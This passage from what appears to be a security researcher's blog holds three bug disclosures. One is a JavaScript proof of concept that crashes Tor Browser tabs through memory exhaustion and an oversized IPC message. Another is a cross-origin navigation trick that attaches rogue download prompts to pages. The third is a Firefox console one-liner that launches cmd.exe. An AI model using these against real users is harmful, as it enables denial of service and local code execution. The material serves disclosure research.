Tuesday 24 October 2017

Tor Browser IPC crash at MOZ_CRASH()

Written by   on   with No comments
Hi Internet,
 
IPC : Inter-process communication is a protocol short form of IPDL is a mozilla specific language to pass messages between  process and threads in secure way.

Note: Most of the IPC based crashes in browser is not eligible for BBB  //Not Sure

Snip Code :

<script>
function tor()
 {
 
    var uristring = unescape("%u4141%u4141");
     
    for(i=0; i <= 50 ; ++i)
 {
        uristring+=uristring;
        document.write(uristring);
    }   
    document.write(uristring);
}
</script>
</head>
<body onload="tor()">
</body>

Running the above code in TOR crashes the tab - 'Gah! This tab has crashed.

Running TOR in debug mode generated this below error :












So, this seems to be kind of a resource exhaustion attack that leads to a crash in TOR,  For instance if you try in a vanilla Firefox it freezes your page and if one disables multiprocess mode one can witness this behavior in a Tor Browser as well.

Running the snip code Asan build gets :



















Looking at the particular code you'll see:
#ifdef MOZ_CRASHREPORTER
      CrashReporter::AnnotateCrashReport(NS_LITERAL_CSTRING("IPCMessageName"), nsDependentCString(msg->name()));
      CrashReporter::AnnotateCrashReport(NS_LITERAL_CSTRING("IPCMessageSize"), nsPrintfCString("%d", msg->size()));
#endif
      MOZ_CRASH("IPC message size is too large");

So, what seems to be happening here is that without --disable-crashreporter (which is used for vanilla Firefox builds) the tab loading your code is stuck in the #ifdef MOZ_CRASHREPORTER block while Tor Browser (which uses --disable-crashreporter) is hitting the MOZ_CRASH() call directly.

This crashes at MOZ_CRASH() because IPC Message is too large. This issue was marked as informative  by TOR via H1


Share:

Monday 24 April 2017

Navigating to non-same origin windows in browsers.

Written by   on   with No comments
Lets do this.. Works almost in every browsers. Another Interesting Navigation trick. It is an little-known property of web browsers that one document can always navigate other, non-same-origin windows to arbitrary URLs. Perhaps more interestingly, you can also navigate third-party documents to resources served with Content-Disposition attachment, in which case, you get the original contents of the address bar, plus a rogue download prompt attached to an unsuspecting page that never wanted you to download that file.

Video POC :

No bounty was awarded, because :
"The behavioral of the browser is legit, the same thing happens in chrome or other browsers. We will invalidate your report."

Bug Reported by : Dhiraj Mishra  
Share:

Saturday 4 March 2017

Firefox Webconsole allows arbitrary code to execute.

Written by   on   with No comments
Lets do this....

Steps to Reproduce :

1. Open New Tab
2. Ctrl+Shft+K to open a console.
3. Run the following code on the Console

f=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);f.initWithPath('c:\\Windows\\System32\\cmd.exe');f.launch()

'about:newtab' is considered a chrome privileged page, injecting code within such a context would result in automatic RCE.

Video POC :



Bug Reported by : Dhiraj Mishra  
Share:

Tuesday 24 January 2017